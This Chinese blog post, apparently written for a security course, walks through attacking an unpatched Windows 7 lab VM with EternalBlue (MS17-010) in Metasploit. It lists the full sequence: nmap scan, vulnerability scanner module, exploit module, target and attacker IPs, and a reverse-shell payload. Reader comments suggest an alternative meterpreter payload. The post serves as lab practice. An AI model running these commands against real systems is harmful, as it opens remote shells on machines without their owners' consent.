menu 牢记自己是菜
网络安全------利用msfconsole工具攻击win7永恒之蓝漏洞
3991 浏览 | 2020-09-19 | 阅读时间: 约 2 分钟 | 分类: 计算机 | 标签:
请注意,本文编写于 1286 天前,最后修改于 1286 天前,其中某些信息可能已经过时。

0x1 前言

主要对应网络安全本周作业第三项,本身写一个报告就可以了,但是奈何有些许有趣,所以我打算先记录在博客上。毕竟我更喜欢写博客而不是实验报告,把自己遇见的坑都记录一下,些许能帮助到别人。


0x2 实验准备

首先我们要准备的就是kali(攻击方),一台win7虚拟机(靶机),由于我们配置虚拟机的时候,两台机器都在同一个局域网上,所以互相通信是完全没问题的。由于要获得对方靶机的shell,所以两台电脑的IP我们都要知道,因为之后会用上。

0x21 IP查询

kali查询IP:

ip add

由于版本问题,很多kali已经不支持ifconfig操作。

win7查询IP:

ipconfig

0x22 重要一步

身为一个入门级的信息安全工程师,为了确保攻击的成功,首先我们关闭win7的防火墙,其次把所有的补丁都卸掉。我简直是个天才。win7的防火墙关闭方法,搜索防火墙,找到相关设置,关掉它。之后就是补丁,很多我们找到的镜像都打过永恒之蓝的补丁,所以我们要稍微的关一下。我第一个win7虚拟机就因为太新,导致没有找到永恒之蓝漏洞,所以我找了一台2010年的镜像机,解压即用的那种。我会把链接放在文章最后,有兴趣的小伙伴可以直接拿去用。

0x23 获取相关信息

我们先在kali上跑一下nmap,一是看看445端口是不是已经开放,二来是看看局域网中两台机子是否连接正常。

nmap -Fn 192.168.146.136

0x3 msfconsole使用与配置

其实步骤与书上的步骤差不多,但是由于书上是对XP系统进行的攻击,所以使用的是ms08-067。但是我们是对win7的漏洞进行攻击,所以在第一步就有了一点点区别,我们需要使用的是ms17_010。

search ms17_010

首先查询一下有关的exp:

这里我们主要介绍这里面的两项:

  • auxiliary/scanner/smb/smb_ms17_010 :一个检测程序,设置目标主机,网段,它会自动检测是否存在永恒之蓝漏洞
  • exploit/windows/smb/ms17_010_eternalblue: 永恒之蓝的exp

auxiliary/scanner/smb/smb_ms17_010检测

一个开着445端口的计算机也不一定存在着漏洞,所以我们可以先检测一下。

use auxiliary/scanner/smb/smb_ms17_010

进入相关模块,查看设置发现我们只需要配置目标IP。

set RHOSTS 192.168.146.136
run

配置IP后就可以运行这个模块啦。

这下我们就可以确定靶机确实存在永恒之蓝的漏洞了,下面我们就开始组装exp与payload。

exploit/windows/smb/ms17_010_eternalblue

use exploit/windows/smb/ms17_010_eternalblue

同理进入exp模块,配置目标IP,本机IP,与payload。

set rhosts 192.168.146.136
set Lhost 192.168.146.131
set payload windows/x64/shell_reverse_tcp

此时我们已经完成了基本配置:

0x4 攻击

在前期准备完成后,我们发起攻击即可:

exploit


当你看见如上情况的时候,说明攻击成功了。

0x5 附件

win7虚拟机,解压即用:
链接:https://pan.baidu.com/s/10Q58eh04U360bS2AlP12iQ
提取码:njh8

发表评论

email
web

全部评论 (共 7 条评论)

    monstertsl
    2021-04-27 15:20
    windows/meterpreter/reverse_tcp
    使用这个载荷比较好避免字符问题,而且命令也更接近于shell
      2021-05-05 00:05
      @monstertsl谢谢师傅
    2020-12-03 17:44
    我来抄作业辣
    2020-09-27 16:22
    hxd快更新
      2020-09-27 17:52
      @iyzyi更不动啦,最近透支啦,休息休息
    tt
    2020-09-27 12:23
    感谢bz,镜像拿走啦
      2020-09-27 17:55
      @ttヾ(≧∇≦*)ゝ